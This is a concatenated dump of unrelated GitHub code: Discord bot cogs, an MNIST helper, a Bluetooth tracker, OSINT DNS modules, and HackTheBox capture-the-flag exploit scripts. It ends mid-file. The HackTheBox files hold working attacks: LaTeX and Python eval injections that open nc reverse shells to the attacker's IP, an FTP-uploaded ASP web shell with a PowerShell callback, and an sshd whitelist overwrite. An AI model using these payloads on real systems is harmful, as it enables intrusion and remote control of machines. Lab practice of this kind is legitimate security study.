embed=discord.Embed(title="役職導入成功",description=f"`{whats}`") await ctx.send(embed=embed) else: embed=discord.Embed(title="役職導入失敗",description="`変更に失敗しました`") await ctx.send(embed=embed) @temple.command() async def delete(self, ctx, what=None): conn=r.connect() kk=conn.smembers("開発管理者") k=[l for l in kk] cai=ctx.author.id cai=str(cai) if cai not in k: return await ctx.send("使用できません") if what==None: return await ctx.send("役職を指定して下さい") p=conn.srem("人狼役職",what) if p ==True: embed=discord.Embed(title="役職削除成功",description=f"`{what}`") await ctx.send(embed=embed) else: embed=discord.Embed(title="役職削除失敗",description="`変更に失敗しました`") await ctx.send(embed=embed) def setup(bot): bot.add_cog(jrole(bot)) ```
{ "source": "8ka1alu/text-to-voice", "score": 3 }
#### File: text-to-voice/cogs/vc.py ```python import discord from discord.ext import commands import os import r from gtts import gTTS import discordbot as dib prefix = dib.prefix conn = r.connect() ffmpegopts = { 'before_options': '-nostdin', 'options': '-vn' } class VC(commands.Cog): def __init__(self, bot): self.bot = bot @commands.command(aliases=["connect","summon","con"]) async def join(self, ctx): """ボイスチャンネルに接続""" voice_state = ctx.author.voice if (not voice_state) or (not voice_state.channel): await ctx.send("先にボイスチャンネルに入っている必要があります。") return vch = conn.exists('voice_ch') if vch == 1: ch_id = conn.get('voice_ch') await ctx.send(f"現在別チャンネルにて使用中です(id:{ch_id})") return channel = voice_state.channel await channel.connect() conn.set('voice_ch',ctx.channel.id) embed = discord.Embed(title="**接続完了**", description=f"接続チャンネル名```{channel.name}```") embed.timestamp = ctx.message.created_at await ctx.send(embed = embed) @commands.command(aliases=["disconnect","bye","dis"]) async def leave(self, ctx): """ボイスチャンネルから退室""" voice_client = ctx.message.guild.voice_client if not voice_client: await ctx.send("Botはこのサーバーのボイスチャンネルに参加していません。") return await voice_client.disconnect() conn.delete('voice_ch') embed = discord.Embed(title="**ボイスチャンネルから切断しました**", description=None) embed.timestamp = ctx.message.created_at await ctx.send(embed = embed) @commands.Cog.listener() async def on_message(self, message): """メッセージの変換""" if message.author.bot: return if message.content.startswith(prefix): return vch = conn.exists('voice_ch') if vch == 0: return ch_id = conn.get('voice_ch') if str(message.channel.id) == ch_id: voice_client = message.guild.voice_client myText = message.content language ='ja' output = gTTS(text=myText, lang=language, slow=False) output.save("voice.mp3") ffmpeg_audio_source = discord.FFmpegPCMAudio("voice.mp3", **ffmpegopts) voice_client.play(ffmpeg_audio_source) return @commands.Cog.listener() async def on_guild_join(self, guild): """bot導入時挨拶""" ch=guild.system_channel em = discord.Embed(title="**導入ありがとうございます**",description=f"HELPは```{prefix}help```で表示できます", color=discord.Color.blue()) if ch != None: await ch.send(embed=em) def setup(bot): bot.add_cog(VC(bot)) ```
{ "source": "8ka1alu/vs-cog", "score": 2 }
#### File: vs-cog/cogs/roles.py ```python from discord.ext import commands # Bot Commands Frameworkのインポート import discord import asyncio import random import datetime great_owner_id = 459936557432963103 # コグとして用いるクラスを定義。 class roles(commands.Cog): # rolesクラスのコンストラクタ。Botを受取り、インスタンス変数として保持。 def __init__(self, bot): self.bot = bot # メインとなるroleコマンド @commands.group(aliases=['rl']) @commands.has_permissions(manage_guild=True) async def role(self, ctx): """役職関連(管理者用)""" # サブコマンドが指定されていない場合、メッセージを送信する。 if ctx.invoked_subcommand is None: await ctx.send('このコマンドにはサブコマンドが必要です。') # roleコマンドのサブコマンド # 指定したユーザーに指定した役職を付与する。 @role.command(aliases=['ad']) async def add(self, ctx, member: discord.Member, role: discord.Role): """付与(管理者用)""" await member.add_roles(role) await ctx.send('付与しました。') # roleコマンドのサブコマンド # 指定したユーザーから指定した役職を剥奪する。 @role.command(aliases=['rm']) async def remove(self, ctx, member: discord.Member, role: discord.Role): """剥奪(管理者用)""" await member.remove_roles(role) await ctx.send('剥奪しました。') # roleコマンドのサブコマンド # 指定した役職を削除する。 @role.command(aliases=['dl']) async def delete(self, ctx, role: discord.Role=None): """削除(管理者用)""" if role == None: await ctx.send('役職名を指定して下さい。') return #role = discord.utils.get(ctx.guild.roles, name=role_name) await role.delete() await ctx.send('削除しました。') # roleコマンドのサブコマンド # 役職を作成する。 @role.command(aliases=['cr']) async def create(self, ctx, what= None): """作成(管理者用)""" if what == None: what = "new role" rote = 0 #システム hoist = False mentionable = False #基本権限 administrator = False view_audit_log = False manage_guild = False manage_roles = False manage_channels = False kick_members = False ban_members = False create_instant_invite = False change_nicknames = False manage_nicknames = False manage_emojis = False manage_webhooks = False read_messages = False #テキスト権限 send_messages = False send_tts_messages = False manage_messages = False embed_links = False attach_files = False read_message_history = False mention_everyone = False external_emojis = False add_reactions = False #ボイス権限 connect = False speak = False mute_members = False deafen_members = False move_members = False use_voice_activation = False while rote < 2: if rote == 1: await msg.delete() if read_messages == True: await msgf.delete() await msgs.delete() rote=0 await asyncio.sleep(0.4) roleedit = discord.Embed(title="権限設定",description=f"番号・記号を入力して下さい。") roleedit.add_field(name=f"**オンラインメンバーとは別にロールメンバーを表示する({hoist})**",value='`a`') roleedit.add_field(name=f"**このロールに対して@mentionを許可する({mentionable})**",value='`b`') roleedit.add_field(name=f"**管理者({administrator})**",value='`1`') roleedit.add_field(name=f"**監査ログを表示({view_audit_log})**",value='`2`') roleedit.add_field(name=f"**サーバーの管理({manage_guild})**",value='`3`') roleedit.add_field(name=f"**ロールの管理({manage_roles})**",value='`4`') roleedit.add_field(name=f"**チャンネルの管理({manage_channels})**",value='`5`') roleedit.add_field(name=f"**メンバーをKICK({kick_members})**",value='`6`') roleedit.add_field(name=f"**メンバーをBAN({ban_members})**",value='`7`') roleedit.add_field(name=f"**招待を作成({create_instant_invite})**",value='`8`') roleedit.add_field(name=f"**ニックネームの変更({change_nicknames})**",value='`9`') roleedit.add_field(name=f"**ニックネームの管理({manage_nicknames})**",value='`10`') roleedit.add_field(name=f"**絵文字の管理({manage_emojis})**",value='`11`') roleedit.add_field(name=f"**ウェブフックの管理({manage_webhooks})**",value='`12`') roleedit.add_field(name=f"**テキストチャンネルの閲覧&ボイスチャンネルの表示({read_messages})**",value='`13`') roleedit.add_field(name="----------",value='----------') roleedit.add_field(name="**無付与・設定完了**",value='`0`') msg = await ctx.send(embed=roleedit) if read_messages == True: await asyncio.sleep(0.1) roletxt = discord.Embed(title="テキストの権限",description=f"番号を入力して下さい。") roletxt.add_field(name=f"**メッセージを送信({send_messages})**",value='`14`') roletxt.add_field(name=f"**TTSメッセージを送信({send_tts_messages})**",value='`15`') roletxt.add_field(name=f"**メッセージの管理({manage_messages})**",value='`16`') roletxt.add_field(name=f"**埋め込みリンク({embed_links})**",value='`17`') roletxt.add_field(name=f"**ファイルの添付({attach_files})**",value='`18`') roletxt.add_field(name=f"**メッセージ履歴を読む({read_message_history})**",value='`19`') roletxt.add_field(name=f"**@everyone,@here,すべてのロールにメンション({mention_everyone})**",value='`20`') roletxt.add_field(name=f"**外部の絵文字の使用({external_emojis})**",value='`21`') roletxt.add_field(name=f"**リアクションの追加({add_reactions})**",value='`22`') roletxt.add_field(name="----------",value='----------') roletxt.add_field(name="**無付与・設定完了**",value='`0`') msgs = await ctx.channel.send(embed=roletxt) await asyncio.sleep(0.1) rolevoc = discord.Embed(title="音声の権限",description=f"番号を入力して下さい。") rolevoc.add_field(name=f"**接続({connect})**",value='`23`') rolevoc.add_field(name=f"**発言({speak})**",value='`24`') rolevoc.add_field(name=f"**メンバーをミュート({mute_members})**",value='`25`') rolevoc.add_field(name=f"**メンバーのスピーカーをミュート({deafen_members})**",value='`26`') rolevoc.add_field(name=f"**メンバーを移動({move_members})**",value='`27`') rolevoc.add_field(name=f"**音声検出を使用({use_voice_activation})**",value='`28`') rolevoc.add_field(name="----------",value='----------') rolevoc.add_field(name="**無付与・設定完了**",value='`0`') msgf = await ctx.send(embed=rolevoc) def rotetime(m): return m.content == "a" or "b" or "0" or "1" or "2" or "3" or "4" or "5" or "6" or "7" or "8" or "9" or "10" or "11" or "12" or "13" or "14" or "15" or "16" or "17" or "18" "19" or "20" or "21" or "22" or "23" or "24" or "25" or "26" or "27" or "28" and m.author == ctx.author try: reply = await self.bot.wait_for( "message" , check = rotetime , timeout = 300.0 ) except asyncio.TimeoutError: await ctx.channel.send( "設定を中止します。(type:time over)" ) return else: if reply.content == "0": await msg.delete() if read_messages == True: await msgf.delete() await msgs.delete() rote = 2 elif reply.content == "a": if hoist == False: hoist = True elif hoist == True: hoist = False rote = 1 elif reply.content == "b": if mentionable == False: mentionable = True elif mentionable == True: mentionable = False rote = 1 elif reply.content == "1": if administrator == False: administrator = True elif administrator == True: administrator = False rote = 1 elif reply.content == "2": if view_audit_log == False: view_audit_log = True elif view_audit_log == True: view_audit_log = False rote = 1 elif reply.content == "3": if manage_guild == False: manage_guild = True elif manage_guild == True: manage_guild = False rote = 1 elif reply.content == "4": if manage_roles == False: manage_roles = True elif manage_roles == True: manage_roles = False rote = 1 elif reply.content == "5": if manage_channels == False: manage_channels = True elif manage_channels == True: manage_channels = False rote = 1 elif reply.content == "6": if kick_members == False: kick_members = True elif kick_members == True: kick_members = False rote = 1 elif reply.content == "7": if ban_members == False: ban_members = True elif ban_members == True: ban_members = False rote = 1 elif reply.content == "8": if create_instant_invite == False: create_instant_invite = True elif create_instant_invite == True: create_instant_invite = False rote = 1 elif reply.content == "9": if change_nicknames == False: change_nicknames = True elif change_nicknames == True: change_nicknames = False rote = 1 elif reply.content == "10": if manage_nicknames == False: manage_nicknames = True elif manage_nicknames == True: manage_nicknames = False rote = 1 elif reply.content == "11": if manage_emojis == False: manage_emojis = True elif manage_emojis == True: manage_emojis = False rote = 1 elif reply.content == "12": if manage_webhooks == False: manage_webhooks = True elif manage_webhooks == True: manage_webhooks = False rote = 1 elif reply.content == "13": if read_messages == False: read_messages = True msgf = await ctx.send("○") msgs = await ctx.send("○") elif read_messages == True: read_messages = False send_messages = False send_tts_messages = False manage_messages = False embed_links = False attach_files = False read_message_history = False mention_everyone = False external_emojis = False add_reactions = False connect = False speak = False mute_members = False deafen_members = False move_members = False use_voice_activation = False await msgf.delete() await msgs.delete() rote = 1 elif reply.content == "14": if send_messages == False: send_messages = True elif send_messages == True: send_messages = False rote = 1 elif reply.content == "15": if send_tts_messages == False: send_tts_messages = True elif send_tts_messages == True: send_tts_messages = False rote = 1 elif reply.content == "16": if manage_messages == False: manage_messages = True elif manage_messages == True: manage_messages = False rote = 1 elif reply.content == "17": if embed_links == False: embed_links = True elif embed_links == True: embed_links = False rote = 1 elif reply.content == "18": if attach_files == False: attach_files = True elif attach_files == True: attach_files = False rote = 1 elif reply.content == "19": if read_message_history == False: read_message_history = True elif read_message_history == True: read_message_history = False rote = 1 elif reply.content == "20": if mention_everyone == False: mention_everyone = True elif mention_everyone == True: mention_everyone = False rote = 1 elif reply.content == "21": if external_emojis == False: external_emojis = True elif external_emojis == True: external_emojis = False rote = 1 elif reply.content == "22": if add_reactions == False: add_reactions = True elif add_reactions == True: add_reactions = False rote = 1 elif reply.content == "23": if connect == False: connect = True elif connect == True: connect = False rote = 1 elif reply.content == "24": if speak == False: speak = True elif speak == True: speak = False rote = 1 elif reply.content == "25": if mute_members == False: mute_members = True elif mute_members == True: mute_members = False rote = 1 elif reply.content == "26": if deafen_members == False: deafen_members = True elif deafen_members == True: deafen_members = False rote = 1 elif reply.content == "27": if move_members == False: move_members = True elif move_members == True: move_members = False rote = 1 elif reply.content == "28": if use_voice_activation == False: use_voice_activation = True elif use_voice_activation == True: use_voice_activation = False rote = 1 else: await asyncio.sleep(303.0) await reply.delete() pre = discord.Permissions(administrator=administrator,view_audit_log=view_audit_log,manage_guild=manage_guild,manage_roles=manage_roles,manage_channels=manage_channels,kick_members=kick_members,ban_members=ban_members,create_instant_invite=create_instant_invite,change_nickname=change_nicknames,manage_nicknames=manage_nicknames,manage_emojis=manage_emojis,manage_webhooks=manage_webhooks,read_messages=read_messages,send_messages=send_messages, send_tts_messages=send_tts_messages,manage_messages=manage_messages,embed_links=embed_links,attach_files=attach_files,read_message_history=read_message_history,mention_everyone=mention_everyone,external_emojis=external_emojis,add_reactions=add_reactions, connect=connect,speak=speak,mute_members=mute_members,deafen_members=deafen_members,move_members=move_members,use_voice_activation=use_voice_activation) guild = ctx.guild set_name2 = f"{what}" await guild.create_role(name=set_name2,hoist=hoist,mentionable=mentionable,permissions=pre) await ctx.send(f'作成しました。@' + set_name2) # Bot本体側からコグを読み込む際に呼び出される関数。 def setup(bot): bot.add_cog(roles(bot)) # mainにBotを渡してインスタンス化し、Botにコグとして登録する。 ``` #### File: vs-cog/cogs/scythe_member.py ```python import os import r from discord.ext import commands import discord import random class scythe(commands.Cog): def __init__(self, bot): self.bot = bot self.namebea = 0 self.givepoint = 0 @commands.command(name="コンパス") async def compass_character(self, ctx, op=None): """(アタッカー,ガンナー,タンク,スプリンター)からランダムに出力""" if op == None: cc=random.choice(("アタッカー","ガンナー","タンク","スプリンター")) else: cc=op conn=r.connect() pp=conn.smembers(cc) pp=[cv for cv in pp] gg=random.choice(pp) embed = discord.Embed(title="**ランダムキャラ**",description=f"{ctx.author.mention}さんの使うキャラは") embed.add_field(name=f"**タイプ**",value=f"`{cc}`") embed.add_field(name=f"**キャラ名**",value=f"`{gg}`") await ctx.send(embed=embed) @commands.command(name="登録") async def sighin(self, ctx): """ポイント制度登録""" self.namebea = 0 conn = r.connect() k = conn.keys() cai = str(ctx.author.id) for i in k: if i == cai: self.namebea += 1 if self.namebea == 0: nb = conn.set(cai,"150") nb2 = conn.sadd("scythes",cai) if nb == True: await ctx.send("登録しました。\n登録特典で100Point付与しました。") else: await ctx.send("登録に失敗しました。\nやり直して下さい。") else: await ctx.send("既に登録済みです。") @commands.command(name="ポイント確認") async def get_point(self, ctx, user_id:int= None): """ポイントの確認""" conn=r.connect() ci = str(ctx.author.id) gu = self.bot.get_user(user_id) ui = str(user_id) if user_id == None: embed = discord.Embed(title=f"**{ctx.author.name}さんの情報**", description=None) up = conn.get(ci) embed.add_field(name="現在ポイント", value=f"`{up}p`") await ctx.send(embed=embed) return else: embed = discord.Embed(title=f"**{gu.name}さんの情報**", description=None) up = conn.get(ui) embed.add_field(name="現在ポイント", value=f"`{up}p`") await ctx.send(embed=embed) return @commands.command(name="P制御") async def give_point(self, ctx, user_id:int=None, point:int=None): """ポイント付与・剥奪""" if user_id == None: return await ctx.send("ユーザーIDを設定して下さい。") if point == None: return await ctx.send("付与ポイントを設定して下さい。") self.givepoint = 0 c = str(ctx.author.id) conn = r.connect() sm = conn.smembers('adomin') for ad in sm: if ad == c: self.givepoint += 1 if self.givepoint == 0: return await ctx.send("貴方は操作できません。") un = self.bot.get_user(user_id) ui = str(user_id) up = conn.get(ui) up = int(up) + point us = conn.set(ui,up) if us == True: return await ctx.send(f"{un.name}さんに`{point}`P付与しました。") else: return await ctx.send("付与に失敗しました。\n最初からやり直して下さい。") @commands.command(name="ID取得") async def getid(self, ctx, user_mention:discord.Member=None): """ID確認用""" if user_mention == None: await ctx.send(f"{ctx.author.name}さんのidは") return await ctx.send(ctx.author.id) await ctx.send(f"{user_mention.name}さんのidは") await ctx.send(user_mention.id) @commands.command(name="ポイント管理者") async def point_admin(self, ctx): """ポイント管理者一覧""" P=1 conn = r.connect() sm = conn.smembers('adomin') embed = discord.Embed(title=f"**ポイント管理者一覧**", description=None, color=0x9b59b6) for ad in sm: adm = self.bot.get_user(int(ad)) embed.add_field(name=f"{P}人目", value=f"`{adm}`") P+=1 await ctx.send(embed=embed) @commands.command(name="P集会付与") async def all_give_point(self, ctx): """集会参加ポイント""" self.givepoint = 0 c = str(ctx.author.id) conn = r.connect() sm = conn.smembers('adomin') for ad in sm: if ad == c: self.givepoint += 1 if self.givepoint == 0: return await ctx.send("貴方は操作できません。") mem=conn.smembers("scythes") for p in mem: q=ctx.guild.get_member(int(p)) for ro in q.roles: if ro.name == "集会参加": cg=conn.get(p) bp=int(cg)+150 det=conn.set(p,bp) for am in ctx.guild.members: for adf in am.roles: prole = ctx.guild.get_role(709678662961594371) if adf.name == "集会参加": await am.remove_roles(prole) await ctx.send("付与完了しました。") @commands.command(name="登録者") async def point_geter(self, ctx): """ポイント登録者一覧""" P=1 conn = r.connect() sm = conn.smembers('scythes') embed = discord.Embed(title=f"**登録者**", description=None) for ad in sm: adm = self.bot.get_user(int(ad)) embed.add_field(name=f"{P}人目", value=f"`{adm}`") P+=1 await ctx.send(embed=embed) def setup(bot): bot.add_cog(scythe(bot)) ``` #### File: vs-cog/cogs/test.py ```python from discord.ext import commands # Bot Commands Frameworkのインポート import discord import asyncio great_owner_id = 459936557432963103 # コグとして用いるクラスを定義。 class test(commands.Cog): # testクラスのコンストラクタ。Botを受取り、インスタンス変数として保持。 def __init__(self, bot): self.bot = bot @commands.command() async def say(self, ctx, what): """オウム返し""" if ctx.author.id != <PASSWORD>: return await ctx.send(what) # Bot本体側からコグを読み込む際に呼び出される関数。 def setup(bot): bot.add_cog(test(bot)) # mainにBotを渡してインスタンス化し、Botにコグとして登録する。 ```
{ "source": "8kta/ShuffleMNIST", "score": 3 }
#### File: 8kta/ShuffleMNIST/RandomAnchors.py ```python import torch from Sphere import Sphere class RandomAnchors(): ''' RandomAnchors class has been made to give random centes for the images to be pasted in a tensor wall, this version give entries to the tensor center less than 84. It could be generalized, it would happen in a future. Parameters --------------- num : number of images you want in the wall. radius : radius of the sphere. Returns --------------- anchors : tensor Type These anchors will be the anchos for the images to paste. ''' def __init__(self, num = 1, radius = 42): self.num = num self.radius = radius self.anchors = [] self.sph_centers = [] if num < 1 or type(num) != int: raise ValueError('Number of images must be an integrer greater or igual from 1.') def random_img(self): while len(self.anchors) < self.num: rand = torch.randint(84, size=(1, 2)).reshape(-1) #print(type(rand[0].item())) sph_rand = Sphere(rand, self.radius) center = sph_rand.center() sph_center = Sphere(center,self.radius) if len(self.anchors) == 0: self.anchors.append(rand) self.sph_centers.append(sph_center) else: if any(sph_center.isinterior(center) for sph_center in self.sph_centers) == False: self.anchors.append(rand) self.sph_centers.append(sph_center) pass else: pass return self.anchors if __name__=='__main__' : num = 4 an = RandomAnchors(num) random = an.random_img() print('{} random anchors are {}'.format(num , random)) ```
{ "source": "8L4NK/bluemaho2", "score": 2 }
#### File: bluemaho2/tools/bluetracker.py ```python import sys, time, subprocess def bttrack(adr, dev, delay): error_count = 0 cmd_cc = "hcitool -i %s cc %s" % ( dev, adr ) cmd_lq = "hcitool -i %s lq %s" % ( dev, adr ) cmd_rssi = "hcitool -i %s rssi %s" % ( dev, adr ) while 1: out = subprocess.Popen(cmd_cc.split(),stdout=subprocess.PIPE,stderr=subprocess.PIPE).communicate() time.sleep(1) if len(out[1]): print "can\'t create connection" time.sleep(1) error_count += 1 if error_count == 5: print "exiting.." return 1 else: while 1: out = subprocess.Popen(cmd_lq.split(),stdout=subprocess.PIPE,stderr=subprocess.PIPE).communicate() if len(out[1]): break else: print '%s link quality: %s,' % ( adr, out[0].split()[2]), out = subprocess.Popen(cmd_rssi.split(),stdout=subprocess.PIPE,stderr=subprocess.PIPE).communicate() if len(out[1]): break else: print 'rssi: %s' % (out[0].split()[3]) time.sleep(delay) if len(sys.argv) != 4: print "\n\t bluetracker.py <hciN> <bdaddr> <delay in s, default=0.2>\n" else: # get original local name and mode orig_auth = False cmd = "hciconfig -a %s" % (sys.argv[1]) cmd_out = subprocess.Popen(cmd.split(),stdout=subprocess.PIPE).communicate() if cmd_out[0]: a = cmd_out[0].split('\n\t') for b in a: if "AUTH" in b: orig_auth = True cmd = "hciconfig -a %s noauth" % (hci_dev) subprocess.Popen(cmd.split(),stdout=subprocess.PIPE,stderr=subprocess.PIPE).communicate() bttrack(sys.argv[2], sys.argv[1], float(sys.argv[3])) if orig_auth == True: cmd = "hciconfig -a %s auth" % (hci_dev) subprocess.Popen(cmd.split(),stdout=subprocess.PIPE,stderr=subprocess.PIPE).communicate() ```
{ "source": "8L4NK/FullAutoOSINT", "score": 2 }
#### File: modules/action/osint_dns_zonetransfer.py ```python from core.osintModule import osintModule from core.keystore import KeyStore as kb from core.utils import Utils from core.mydns import MyDNS import re class osint_dns_zonetransfer(osintModule): def __init__(self, config, display, lock): super(osint_dns_zonetransfer, self).__init__(config, display, lock) self.title = "DNS Zone Transfer" self.shortName = "DNSXfer" self.description = "Checking for DNS zone transfers on DNS domains" self.requirements = [] self.triggers = ["newDNSDomain"] self.types = ["OSINT", "DNS"] def getTargets(self): self.targets = kb.get('osint/dnsdomain/') def fixStr(self, text): if isinstance(text, str): text = text.lower() elif isinstance(text, unicode): text = text.encode('utf-8') text = text.lower() return text def processZoneLine(self, text, domain): lines = text.splitlines() for line in lines: line = self.fixStr(line) result = re.match("(\S+?)\s+?(\d+?)\s+?(in)\s+?(\S+?)\s+(.*)", line.strip()) if result: host = self.fixStr(result.group(1)) ttl = self.fixStr(result.group(2)) record_class = self.fixStr(result.group(3)) record_type = self.fixStr(result.group(4)) record_data = self.fixStr(result.group(5)) if host == "@": host = domain if record_type == "a": host = host[:host.find(domain) + len(domain)] kb.add('osint/dnsdomain/' + domain + '/A/' + host + "/" + record_data) self.fire("newDNSARecord") elif record_type == "ns": temp = record_data[:-1] temp = temp[:host.find(domain) + len(domain)] kb.add('osint/dnsdomain/' + domain + '/NS/' + temp) self.fire("newDNSNSRecord") #elif record_type == "txt": # print line #elif record_type == "mx": # print line elif record_type == "cname": host = host[:host.find(domain) + len(domain)] kb.add('osint/dnsdomain/' + domain + '/CNAME/' + host + "/" + record_data[:-1]) self.fire("newDNSCNAMERecord") elif record_type == "ptr": if "in-addr.arpa" in host: record_data = record_data[:host.find(domain) + len(domain)] kb.add('osint/dnsdomain/' + domain + '/PTR/' + host + "/" + record_data) self.fire("newDNSPTRRecord") host = host.replace("in-addr.arpa", "") parts = host.split('.') host = parts[3] + "." + parts[2] + "." + parts[1] + "." + parts[0] kb.add('osint/dnsdomain/' + domain + '/A/' + host + "/" + record_data) self.fire("newDNSARecord") #else: # print record_type #print line.strip() def process(self): # load any targets we are interested in self.getTargets() # loop over each target for t in self.targets: # verify we have not tested this host before if not self.seentarget(t): # add the new target to the already seen list self.addseentarget(t) self.display.verbose(self.shortName + " - Targetting " + t) # Find NS records ns_list = kb.get('osint/dnsdomain/' + t + '/NS/') ns_list2 = MyDNS.getRecord(t, "NS") for n in ns_list2: n = str(n)[:-1] ns_list.append(n) for ns in ns_list: try: xfr = MyDNS.getZoneXfr(ns, t) text = "" for k in xfr: text += xfr[k].to_text(k) + "\n" self.processZoneLine(xfr[k].to_text(k), t) if text: # make outfile outfile = self.config["proofsDir"] + self.shortName + "_" + t + "_" + ns + "_" + Utils.getRandStr(10) # output to file Utils.writeFile(text, outfile) self.fire("newDNSZoneXfr") except Exception as e: print e return ``` #### File: modules/test/ct_crtsh.py ```python import requests import re def search(domain): base_url = "https://crt.sh/?q={}" wildcard_domain = "%25.{}".format(domain) url = base_url.format(wildcard_domain) ua = 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1' req = requests.get(url, headers={'User-Agent': ua}) if req.ok: try: content = req.content.decode('utf-8') pattern = r'>(.*\.' + domain + ')<' regex = re.compile(pattern, re.IGNORECASE) data = [] for match in regex.finditer(content): data.append(match.group(1)) return list(set(data)) except Exception as err: print("Error retrieving information.") print err return None for i in search("rapid7.com"): print i ``` #### File: modules/test/hackettarget.py ```python import requests import re def search(domain): base_url = "https://api.hackertarget.com/hostsearch/?q={}" url = base_url.format(domain) ua = 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1' req = requests.get(url, headers={'User-Agent': ua}) if req.ok: try: content = req.content.decode('utf-8') data = [] for row in content.split(): parts = row.split(",") print parts[0] + " " + parts[1] data.append(parts[0]) return list(set(data)) except Exception as err: print("Error retrieving information.") print err return None for i in search("rapid7.com"): print i ```
{ "source": "8L4NK/HackTheBox", "score": 2 }
#### File: HackTheBox/Chaos/shell.py ```python import netifaces as ni import subprocess import requests def request(ip): data = 'content=%5Cimmediate%5Cwrite18%7Brm+%2Ftmp%2Ff%3Bmkfifo+%2Ftmp%2Ff%3Bcat+%2Ftmp%2Ff%7C%2Fbin%2Fsh+-i+2%3E%261%7Cnc+{}+9191+%3E%2Ftmp%2Ff%7D&template=test2'.format(ip) requests.post('http://chaos.htb/J00_w1ll_f1Nd_n07H1n9_H3r3/ajax.php', data=data, headers = {'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8'}) if __name__ == '__main__': try: ni.ifaddresses('tun0') ip = ni.ifaddresses('tun0')[ni.AF_INET][0]['addr'] print ip subprocess.Popen(["nc -lvnp 9191"], shell=True, stderr=subprocess.STDOUT) request(ip) except: pass ``` #### File: HackTheBox/Conceal/shell.py ```python import subprocess import requests import ftplib def main(): ftp() try: r = requests.get("http://10.10.10.116/upload/cmd.asp?cmd=powershell.exe%20-ExecutionPolicy%20Bypass%20C:%5Cinetpub%5Cwwwroot%5Cupload%5Cshell.ps1",verify=False,timeout=3) except: pass try: subprocess.call(['nc -lvnp 9191'], shell=True, stderr=subprocess.STDOUT) except: print('[*] Quitting netcat...') def ftp(): ftp = ftplib.FTP("10.10.10.116") ftp.login('anonymous', 'conceal') files = ['cmd.asp','shell.ps1'] for filename in files: file = open('files/{}'.format(filename),'rb') ftp.storbinary('STOR {}'.format(filename), file) file.close() ftp.quit() if __name__ == '__main__': main() ``` #### File: HackTheBox/Craft/craft.py ```python import requests, json import socket, subprocess import netifaces as ni from sys import exit from requests.packages.urllib3.exceptions import InsecureRequestWarning requests.packages.urllib3.disable_warnings(InsecureRequestWarning) class Craft(object): def __init__(self, proxies='https://127.0.0.1:8080'): self.brew_api = 'https://api.craft.htb/api/brew/' self.login_api = 'https://api.craft.htb/api/auth/login' self.proxies = {'https':proxies} self.token = self.getToken() self.insertBrew() #self.getBrews() def getToken(self): r = requests.get(self.login_api, auth=('dinesh', '<PASSWORD>'), verify=False) json_response = json.loads(r.text) token = json_response['token'] return token def insertBrew(self): headers = { 'X-Craft-API-Token': self.token, 'Content-Type': 'application/json' } cmd = "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {} 9191 >/tmp/f".format(ip) data = { "name":"artikrh", "brewer":"artikrh", "style":"artikrh", "abv":"""__import__('os').popen('{}').read()""".format(cmd) } # if eval('%s > 1' % request.json['abv']): try: r = requests.post(self.brew_api, headers=headers, json=data, timeout=2, verify=False) # proxies=self.proxies except: #subprocess.call(['nc -lvnp 9191'], shell=True, stderr=subprocess.STDOUT) print("""[*] Execute for PTY: python -c 'import pty;pty.spawn("/bin/sh");'""") pass def getBrews(self): r = requests.get(self.brew_api, verify=False) json_response = json.loads(r.text) print(json_response) if __name__ == '__main__': try: ip = ni.ifaddresses('tun0')[ni.AF_INET][0]['addr'] socket.gethostbyname('api.craft.htb') except socket.error: print('[*] Missing api.craft.htb entry in /etc/hosts. Exiting...') exit() except: print('[*] Failed to retrieve tun0 IP address. Is your VPN on?') exit() Craft() ``` #### File: HackTheBox/Flujab/allowssh.py ```python import requests,os import netifaces as ni from requests.packages.urllib3.exceptions import InsecureRequestWarning requests.packages.urllib3.disable_warnings(InsecureRequestWarning) id_rsa = """ -----<KEY> <KEY> """ id_rsa = id_rsa.strip() def main(): ni.ifaddresses('tun0') ip = ni.ifaddresses('tun0')[ni.AF_INET][0]['addr'] cookies = { 'session': '0b7d4ec2fe297b3b36863a0020f503164fe53374', 'mp_df4919c7cb869910c1e188dbc2918807_mixpanel': '%7B%22distinct_id%22%3A%20%22168b141ea2d235-07f82fc062bb9b-3c6e4645-1fa400-168b141ea2e4e0%22%2C%22version%22%3A%20%222.1.25%22%2C%22platform%22%3A%20%22debian%22%2C%22platformUnmapped%22%3A%20%22debian%22%2C%22%24initial_referrer%22%3A%20%22%24direct%22%2C%22%24initial_referring_domain%22%3A%20%22%24direct%22%7D', } headers = { 'Host': 'sysadmin-console-01.flujab.htb:8080', 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:65.0) Gecko/20100101 Firefox/65.0', 'Accept': 'application/json, text/plain, */*', 'Accept-Language': 'en-US,en;q=0.5', 'Accept-Encoding': 'gzip, deflate', 'Referer': 'https://sysadmin-console-01.flujab.htb:8080/view/notepad//etc/ssh/sshd_wl', 'Content-Type': 'application/json;charset=utf-8', 'Content-Length': '104', 'Connection': 'close', } params = ( ('encoding', 'utf-8'), ) data = 'sshd : {}\nsshd : {}'.format(ip,ip) response = requests.post('https://sysadmin-console-01.flujab.htb:8080/api/filesystem/write//etc/ssh/sshd_wl', headers=headers, params=params, cookies=cookies, data=data, verify=False) print '[*] Response code: {}'.format(response.status_code) print "[*] Run: ssh -i files/id_rsa [email protected] -t 'bash --noprofile'" if __name__ == '__main__': if not os.path.exists('files'): os.system('mkdir files') if not os.path.exists('files/id_rsa'): with open('files/id_rsa','w') as privkey: os.chmod("files/id_rsa", 0600) privkey.write(id_rsa) main() ``` #### File: Flujab/files/smtpserver.py ```python from datetime import datetime import asyncore,re import netifaces as ni from smtpd import SMTPServer class EmlServer(SMTPServer): no = 0 def process_message(self, peer, mailfrom, rcpttos, data): for line in data.splitlines(): if re.search('Ref:',line): print(line.split('Ref:',1)[1]) self.no += 1 def run(ip): foo = EmlServer(('{}'.format(ip), 25), None) print('[*] SMTP Server started') try: asyncore.loop() except KeyboardInterrupt: pass if __name__ == '__main__': ni.ifaddresses('tun0') ip = ni.ifaddresses('tun0')[ni.AF_INET][0]['addr'] run(ip) ``` #### File: HackTheBox/Fortune/rce.py ```python import requests from bs4 import BeautifulSoup from sys import exit def rce(): headers = { 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:65.0) Gecko/20100101 Firefox/65.0', 'Accept-Language': 'en-US,en;q=0.5', 